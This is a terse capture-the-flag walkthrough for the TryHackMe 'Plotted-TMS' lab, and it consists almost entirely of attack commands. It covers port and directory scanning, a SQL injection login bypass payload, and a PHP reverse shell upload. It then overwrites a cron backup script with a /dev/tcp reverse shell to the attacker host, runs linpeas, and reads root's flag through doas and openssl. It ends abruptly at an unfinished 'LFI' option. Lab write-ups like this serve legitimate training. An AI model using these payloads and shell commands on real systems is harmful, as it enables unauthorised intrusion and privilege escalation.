Plotted-TMS

Room Link: https://tryhackme.com/room/plottedtms

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/445 - HTTP

Kali

gobuster dir -u http://$VICTIM:445 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Username: admin' or '1'='1'-- -
Password: admin

Initial Shell

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

rm -f /var/www/scripts/backup.sh 
echo '#!/bin/bash' > /var/www/scripts/backup.sh 
echo "sh -i >& /dev/tcp/$KALI/1338 0>&1" >> /var/www/scripts/backup.sh 
chmod +x /var/www/scripts/backup.sh
cat /var/www/scripts/backup.sh 

Kali

nc -lvnp 1338

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Privilege Escalation

Option #1

Victim

LFILE=/root/root.txt
doas -u root openssl enc -in "$LFILE"

Option #2

Victim

LFI